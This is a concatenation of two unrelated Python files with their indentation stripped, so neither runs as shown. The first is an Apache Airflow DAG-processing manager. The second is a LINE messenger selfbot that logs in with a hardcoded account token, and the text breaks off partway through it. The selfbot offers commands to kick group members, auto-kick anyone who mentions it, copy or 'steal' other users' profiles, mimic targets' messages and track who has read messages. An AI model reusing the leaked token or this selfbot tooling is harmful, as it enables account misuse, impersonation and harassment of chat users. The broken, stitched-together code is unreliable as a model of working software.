# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler', 'dag_dir_list_interval')
# Mapping file name and callbacks requests
self._callback_to_execute: Dict[str, List[CallbackRequest]] = defaultdict(list)
self._log = logging.getLogger('airflow.processor_manager')
self.waitables: Dict[Any, Union[MultiprocessingConnection, DagFileProcessorProcess]] = {
self._signal_conn: self._signal_conn,
}
def register_exit_signals(self):
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
# So that we ignore the debug dump signal, making it easier to send
signal.signal(signal.SIGUSR2, signal.SIG_IGN)
def _exit_gracefully(self, signum, frame):
"""Helper method to clean up DAG file processors to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.log.debug("Current Stacktrace is: %s", '\n'.join(map(str, inspect.stack())))
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
self.register_exit_signals()
# Start a new process group
os.setpgid(0, 0)
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
return self._run_parsing_loop()
def _run_parsing_loop(self):
# In sync mode we want timeout=None -- wait forever until a message is received
if self._async_mode:
poll_time = 0.0
else:
poll_time = None
self._refresh_dag_dir()
self.prepare_file_path_queue()
if self._async_mode:
# If we're in async mode, we can start up straight away. If we're
# in sync mode we need to be told to start a "loop"
self.start_new_processes()
while True:
loop_start_time = time.monotonic()
ready = multiprocessing.connection.wait(self.waitables.keys(), timeout=poll_time)
if self._signal_conn in ready:
agent_signal = self._signal_conn.recv()
self.log.debug("Received %s signal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_RUN_ONCE:
# continue the loop to parse dags
pass
elif isinstance(agent_signal, CallbackRequest):
self._add_callback_to_queue(agent_signal)
else:
raise ValueError(f"Invalid message {type(agent_signal)}")
if not ready and not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
# are told to (as that would open another connection to the
# SQLite DB which isn't a good practice
# This shouldn't happen, as in sync mode poll should block for
# ever. Lets be defensive about that.
self.log.warning(
"wait() unexpectedly returned nothing ready after infinite timeout (%r)!", poll_time
)
continue
for sentinel in ready:
if sentinel is self._signal_conn:
continue
processor = self.waitables.get(sentinel)
if not processor:
continue
self._collect_results_from_processor(processor)
self.waitables.pop(sentinel)
self._processors.pop(processor.file_path)
self._refresh_dag_dir()
self._find_zombies()
self._kill_timed_out_processors()
# Generate more file paths to process if we processed all the files
# already.
if not self._file_path_queue:
self.emit_metrics()
self.prepare_file_path_queue()
self.start_new_processes()
# Update number of loop iteration.
self._num_run += 1
if not self._async_mode:
self.log.debug("Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
self.collect_results()
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
try:
self._signal_conn.send(
DagParsingStat(
max_runs_reached,
all_files_processed,
)
)
except BlockingIOError:
# Try again next time around the loop!
# It is better to fail, than it is deadlock. This should
# "almost never happen" since the DagParsingStat object is
# small, and in async mode this stat is not actually _required_
# for normal operation (It only drives "max runs")
self.log.debug("BlockingIOError received trying to send DagParsingStat, ignoring")
if max_runs_reached:
self.log.info(
"Exiting dag parsing loop as all files have been processed %s times", self._max_runs
)
break
if self._async_mode:
loop_duration = time.monotonic() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
def _add_callback_to_queue(self, request: CallbackRequest):
self._callback_to_execute[request.full_filepath].append(request)
# Callback has a higher priority over DAG Run scheduling
if request.full_filepath in self._file_path_queue:
# Remove file paths matching request.full_filepath from self._file_path_queue
# Since we are already going to use that filepath to run callback,
# there is no need to have same file path again in the queue
self._file_path_queue = [
file_path for file_path in self._file_path_queue if file_path != request.full_filepath
]
self._file_path_queue.insert(0, request.full_filepath)
def _refresh_dag_dir(self):
"""Refresh file paths from dag dir if we haven't done it for too long."""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = now
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors()
except Exception:
self.log.exception("Error removing old import errors")
SerializedDagModel.remove_deleted_dags(self._file_paths)
DagModel.deactivate_deleted_dags(self._file_paths)
from airflow.models.dagcode import DagCode
DagCode.remove_deleted_code(self._file_paths)
def _print_stat(self):
"""Occasionally print out stats about how fast the files are getting processed"""
if 0 < self.print_stats_interval < time.monotonic() - self.last_stat_print_time:
if self._file_paths:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = time.monotonic()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(~errors.ImportError.filename.in_(self._file_paths))
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:type known_file_paths: list[unicode]
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path", "PID", "Runtime", "# DAGs", "# Errors", "Last Runtime", "Last Run"]
rows = []
now = timezone.utcnow()
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
num_dags = self.get_last_dag_count(file_path)
num_errors = self.get_last_error_count(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = (now - processor_start_time) if processor_start_time else None
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (now - last_run).total_seconds()
Stats.gauge(f'dag_processing.last_run.seconds_ago.{file_name}', seconds_ago)
rows.append((file_path, processor_pid, runtime, num_dags, num_errors, last_runtime, last_run))
# Sort by longest last runtime. (Can't sort None values in python3)
rows = sorted(rows, key=lambda x: x[3] or 0.0)
formatted_rows = []
for file_path, pid, runtime, num_dags, num_errors, last_runtime, last_run in rows:
formatted_rows.append(
(
file_path,
pid,
f"{runtime.total_seconds():.2f}s" if runtime else None,
num_dags,
num_errors,
f"{last_runtime:.2f}s" if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S") if last_run else None,
)
)
log_str = (
"\n"
+ "=" * 80
+ "\n"
+ "DAG File Processing Stats\n\n"
+ tabulate(formatted_rows, headers=headers)
+ "\n"
+ "=" * 80
)
self.log.info(log_str)
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
stat = self._file_stats.get(file_path)
return stat.last_duration if stat else None
def get_last_dag_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of dags loaded from that file, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.num_dags if stat else None
def get_last_error_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of import errors from processing, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.import_errors if stat else None
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
stat = self._file_stats.get(file_path)
return stat.last_finish_time if stat else None
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def get_run_count(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the number of times the given file has been parsed
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.run_count if stat else 0
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:type new_file_paths: list[unicode]
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
Stats.decr('dag_processing.processes')
processor.terminate()
self._file_stats.pop(file_path)
self._processors = filtered_processors
def wait_until_finished(self):
"""Sleeps until all the processors are done."""
for processor in self._processors.values():
while not processor.done:
time.sleep(0.1)
def _collect_results_from_processor(self, processor) -> None:
self.log.debug("Processor for %s finished", processor.file_path)
Stats.decr('dag_processing.processes')
last_finish_time = timezone.utcnow()
if processor.result is not None:
num_dags, count_import_errors = processor.result
else:
self.log.error(
"Processor for %s exited with return code %s.", processor.file_path, processor.exit_code
)
count_import_errors = -1
num_dags = 0
stat = DagFileStat(
num_dags=num_dags,
import_errors=count_import_errors,
last_finish_time=last_finish_time,
last_duration=(last_finish_time - processor.start_time).total_seconds(),
run_count=self.get_run_count(processor.file_path) + 1,
)
self._file_stats[processor.file_path] = stat
file_name = os.path.splitext(os.path.basename(processor.file_path))[0].replace(os.sep, '.')
Stats.timing(f'dag_processing.last_duration.{file_name}', stat.last_duration)
def collect_results(self) -> None:
"""Collect the result from any finished DAG processors"""
ready = multiprocessing.connection.wait(self.waitables.keys() - [self._signal_conn], timeout=0)
for sentinel in ready:
if sentinel is self._signal_conn:
continue
processor = cast(DagFileProcessorProcess, self.waitables[sentinel])
self.waitables.pop(processor.waitable_handle)
self._processors.pop(processor.file_path)
self._collect_results_from_processor(processor)
self.log.debug("%s/%s DAG parsing processes running", len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing", len(self._file_path_queue))
@staticmethod
def _create_process(file_path, pickle_dags, dag_ids, callback_requests):
"""Creates DagFileProcessorProcess instance."""
return DagFileProcessorProcess(
file_path=file_path, pickle_dags=pickle_dags, dag_ids=dag_ids, callback_requests=callback_requests
)
def start_new_processes(self):
"""Start more processors if we have enough slots and files to process"""
while self._parallelism - len(self._processors) > 0 and self._file_path_queue:
file_path = self._file_path_queue.pop(0)
# Stop creating duplicate processor i.e. processor with the same filepath
if file_path in self._processors.keys():
continue
callback_to_execute_for_file = self._callback_to_execute[file_path]
processor = self._create_process(
file_path, self._pickle_dags, self._dag_ids, callback_to_execute_for_file
)
del self._callback_to_execute[file_path]
Stats.incr('dag_processing.processes')
processor.start()
self.log.debug("Started a process (PID: %s) to generate tasks for %s", processor.pid, file_path)
self._processors[file_path] = processor
self.waitables[processor.waitable_handle] = processor
def prepare_file_path_queue(self):
"""Generate more file paths to process. Result are saved in _file_path_queue."""
self._parsing_start_time = time.perf_counter()
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
# Sort the file paths by the parsing order mode
list_mode = conf.get("scheduler", "file_parsing_sort_mode")
files_with_mtime = {}
file_paths = []
is_mtime_mode = list_mode == "modified_time"
file_paths_recently_processed = []
for file_path in self._file_paths:
if is_mtime_mode:
files_with_mtime[file_path] = os.path.getmtime(file_path)
file_modified_time = timezone.make_aware(datetime.fromtimestamp(files_with_mtime[file_path]))
else:
file_paths.append(file_path)
file_modified_time = None
# Find file paths that were recently processed to exclude them
# from being added to file_path_queue
# unless they were modified recently and parsing mode is "modified_time"
# in which case we don't honor "self._file_process_interval" (min_file_process_interval)
last_finish_time = self.get_last_finish_time(file_path)
if (
last_finish_time is not None
and (now - last_finish_time).total_seconds() < self._file_process_interval
and not (is_mtime_mode and file_modified_time and (file_modified_time > last_finish_time))
):
file_paths_recently_processed.append(file_path)
# Sort file paths via last modified time
if is_mtime_mode:
file_paths = sorted(files_with_mtime, key=files_with_mtime.get, reverse=True)
elif list_mode == "alphabetical":
file_paths = sorted(file_paths)
elif list_mode == "random_seeded_by_host":
# Shuffle the list seeded by hostname so multiple schedulers can work on different
# set of files. Since we set the seed, the sort order will remain same per host
random.Random(get_hostname()).shuffle(file_paths)
files_paths_at_run_limit = [
file_path for file_path, stat in self._file_stats.items() if stat.run_count == self._max_runs
]
file_paths_to_exclude = set(file_paths_in_progress).union(
file_paths_recently_processed, files_paths_at_run_limit
)
# Do not convert the following list to set as set does not preserve the order
# and we need to maintain the order of file_paths for `[scheduler] file_parsing_sort_mode`
files_paths_to_queue = [
file_path for file_path in file_paths if file_path not in file_paths_to_exclude
]
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path,
processor.start_time.isoformat(),
)
self.log.debug("Queuing the following files for processing:\n\t%s", "\n\t".join(files_paths_to_queue))
for file_path in files_paths_to_queue:
if file_path not in self._file_stats:
self._file_stats[file_path] = DagFileStat(
num_dags=0, import_errors=0, last_finish_time=None, last_duration=None, run_count=0
)
self._file_path_queue.extend(files_paths_to_queue)
@provide_session
def _find_zombies(self, session):
"""
Find zombie task instances, which are tasks haven't heartbeated for too long
and update the current zombie list.
"""
now = timezone.utcnow()
if (
not self._last_zombie_query_time
or (now - self._last_zombie_query_time).total_seconds() > self._zombie_query_interval
):
# to avoid circular imports
from airflow.jobs.local_task_job import LocalTaskJob as LJ
self.log.info("Finding 'running' jobs without a recent heartbeat")
TI = airflow.models.TaskInstance
DM = airflow.models.DagModel
limit_dttm = timezone.utcnow() - timedelta(seconds=self._zombie_threshold_secs)
self.log.info("Failing jobs without heartbeat after %s", limit_dttm)
zombies = (
session.query(TI, DM.fileloc)
.join(LJ, TI.job_id == LJ.id)
.join(DM, TI.dag_id == DM.dag_id)
.filter(TI.state == State.RUNNING)
.filter(
or_(
LJ.state != State.RUNNING,
LJ.latest_heartbeat < limit_dttm,
)
)
.all()
)
self._last_zombie_query_time = timezone.utcnow()
for ti, file_loc in zombies:
request = TaskCallbackRequest(
full_filepath=file_loc,
simple_task_instance=SimpleTaskInstance(ti),
msg="Detected as zombie",
)
self.log.info("Detected zombie job: %s", request)
self._add_callback_to_queue(request)
Stats.incr('zombies_killed')
def _kill_timed_out_processors(self):
"""Kill any file processors that timeout to defend against process hangs."""
now = timezone.utcnow()
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.error(
"Processor for %s with PID %s started at %s has timed out, killing it.",
file_path,
processor.pid,
processor.start_time.isoformat(),
)
Stats.decr('dag_processing.processes')
Stats.incr('dag_processing.processor_timeouts')
# TODO: Remove after Airflow 2.0
Stats.incr('dag_file_processor_timeouts')
processor.kill()
def max_runs_reached(self):
""":return: whether all file paths have been processed max_runs times"""
if self._max_runs == -1: # Unlimited runs.
return False
for stat in self._file_stats.values():
if stat.run_count < self._max_runs:
return False
if self._num_run < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
Stats.decr('dag_processing.processes')
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
them as orphaned.
"""
pids_to_kill = self.get_all_pids()
if pids_to_kill:
kill_child_processes_by_pids(pids_to_kill)
def emit_metrics(self):
"""
Emit metrics about dag parsing summary
This is called once every time around the parsing "loop" - i.e. after
all files have been parsed.
"""
parse_time = time.perf_counter() - self._parsing_start_time
Stats.gauge('dag_processing.total_parse_time', parse_time)
Stats.gauge('dagbag_size', sum(stat.num_dags for stat in self._file_stats.values()))
Stats.gauge(
'dag_processing.import_errors', sum(stat.import_errors for stat in self._file_stats.values())
)
@property
def file_paths(self):
return self._file_paths
|
ponselfbot.py
|
# -*- coding: utf-8 -*-
#Cakmin_BOTeam Newbie
#Owner:https://line.me/ti/p/~agsantr
#Official Account:http://line.me/ti/p/%40fvz4767v
#Instagram:cakminofficial
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
import time, random, sys, ast, re, os, io, json, subprocess, threading, string, codecs, requests, tweepy, ctypes, urllib, urllib2, wikipedia, goslate
import timeit
from bs4 import BeautifulSoup
from urllib import urlopen
from io import StringIO
from threading import Thread
from gtts import gTTS
from googletrans import Translator
import six
if (six.PY2):
import urllib2
import urllib
else:
import urllib.request
import urllib.parse
cl = LINETCR.LINE()
cl.login(token="EtFJMNmRdY7JT7J03om3.9r0C5FyHndoySvmBoI+OWW.QwDHni6kLrKf7APItHg7KZHXPrF773aCe+j8DxBv/eA=")
cl.loginResult()
print "==================[Login Success]==================="
reload(sys)
sys.setdefaultencoding('utf-8')
helpmsg ="""
╔════[BenhponzCKZ]
╠➩ Help1
╠➩ Help2
╠➩ Help3
╠➩ Help4
╠➩ Help5
╚════[BenhponzCKZ]
"""
helppro ="""
╔════[ Protect Command ]
╠➩ Protect on/off
╠➩ Qr on/off
╠➩ Invit on/off
╠➩ Cancel on/off
╚════[ Protect Command ]
"""
helpself ="""
╔════[ Self Command ]
╠➩ Me〙
╠➩ Myname:
╠➩ Mybio:
╠➩ Myname
╠➩ Mybio
╠➩ Mypict
╠➩ Mycover
╠➩ Mycopy @
╠➩ Mybackup
╠➩ Getgrup image
╠➩ Getmid @
╠➩ Getprofile @
╠➩ Getcontact @
╠➩ Getinfo @
╠➩ Getname @
╠➩ Getbio @
╠➩ Getpict @
╠➩ Getcover @
╠➩ Mention
╠➩ Sider on/off
╠➩ Sider
╠➩ Mimic on/off
╠➩ Micadd @
╠➩ Micdel @
╚════[ Self Command ]
"""
helpset ="""
╔════[ Setting Command ]
╠➩ Contact on/off
╠➩ Autojoin on/off
╠➩ Autoleave on/off
╠➩ Autoadd on/off
╠➩ Like me
╠➩ Like friend
╠➩ Like on
╠➩ My respon on/off
╠➩ My read on/off
╠➩ My simisimi on/off
╚════[ Setting Command ]
"""
helpgrup ="""
╔════[ Group Command ]
╠➩ Link on/off
╠➩ Url
╠➩ Gcreator
╠➩ Kick @
╠➩ Ulti @
╠➩ Cancel
╠➩ Gname:
╠➩ Infogrup
╠➩ Gruplist
╠➩ Friendlist
╠➩ Blocklist
╠➩ Ban @
╠➩ Unban @
╠➩ Clearban
╠➩ Banlist
╠➩ Contactban
╠➩ Midban
╚════[ Group Command ]
"""
helpmed ="""
╔════[ Social Media Command ]
╠➩ kalender
╠➩ tr-id
╠➩ tr-en
╠➩ tr-jp
╠➩ tr-ko
╠➩ say-id
╠➩ say-en
╠➩ say-jp
╠➩ say-ko
╠➩ /cekig
╠➩ /postig
╠➩ checkdate
╠➩ wikipedia
╠➩ lirik
╠➩ video
╠➩ /image
╠➩ /youtube
╚════[ Social Media Command ]
"""
mid = cl.getProfile().mid
Bots=["uf51d1ce5f621343398b1531b3a2fe8c3"]
wait = {
"likeOn":True,
"alwayRead":False,
"detectMention":True,
"kickMention":False,
"steal":False,
'pap':{},
'invite':{},
"spam":{},
'contact':False,
'autoJoin':True,
'autoCancel':{"on":False,"members":50},
'leaveRoom':False,
'timeline':True,
'autoAdd':False,
'message':"Thanks for add by",
"lang":"JP",
"comment":"Haii Kaka",
"commentOn":True,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cNames":" ",
"cNames":"",
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"linkprotect":False,
}
wait2 = {
"readPoint":{},
"readMember":{},
"setTime":{},
"ROM":{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
settings = {
"simiSimi":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
mulai = time.time()
contact = cl.getProfile()
backup = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def download_page(url):
version = (3,0)
cur_version = sys.version_info
if cur_version >= version:
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib.request.Request(url, headers = headers)
resp = urllib.request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
print(str(e))
else:
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(req)
page = response.read()
return page
except:
return"Page Not found"
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1:
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+1)
end_content = s.find(',"ow"',start_content+1)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item)
time.sleep(0.1)
page = page[end_content:]
return items
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def summon(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
return '%02d Jam %02d Menit %02d Detik' % (hours, mins, secs)
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self._client.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
#r.content
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def sendAudio(self, to_, path):
M = Message(to=to_, text=None, contentType = 3)
M.contentMetadata = None
M.contentPreview = None
M2 = self.Talk.client.sendMessage(0,M)
M_id = M2.id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'audio',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload audio failure.')
return True
def sendAudioWithUrl(self, to_, url):
path = '%s/pythonLine-%1.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download audio failure.')
try:
self.sendAudio(to_, path)
except Exception as e:
raise (e)
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for texX in tex:
for command in commands:
if string ==command:
return True
return False
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def bot(op):
try:
if op.type == 0:
return
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 19:
if mid in op.param3:
wait["blacklist"][op.param2] = True
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == mid:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 26:
msg = op.message
if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
cl.sendText(msg.to,text)
if op.type == 26:
msg = op.message
if msg.to in settings["simiSimi"]:
if settings["simiSimi"][msg.to] == True:
if msg.text is not None:
text = msg.text
r = requests.get("http://api.ntcorp.us/chatbot/v1/?text=" + text.replace(" ","+") + "&key=beta1.nt")
data = r.text
data = json.loads(data)
if data['status'] == 200:
if data['result']['result'] == 100:
cl.sendText(msg.to, "[ChatBOT] " + data['result']['response'].encode('utf-8'))
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = ["Penting? pc kak"]
ret_ = "[Auto Respond] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_ + cName)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["kickMention"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = ["Ngetag = auto kick!!"]
ret_ = "[Auto Respond] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
cl.kickoutFromGroup(msg.to,[msg.from_])
break
if msg.contentType == 13:
if wait['invite'] == True:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to, _name + " Berada DiGrup Ini")
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Invite " + _name)
wait['invite'] = False
break
except:
cl.sendText(msg.to,"Error")
wait['invite'] = False
break
if msg.contentType == 13:
if wait["steal"] == True:
_name = msg.contentMetadata["displayName"]
copy = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
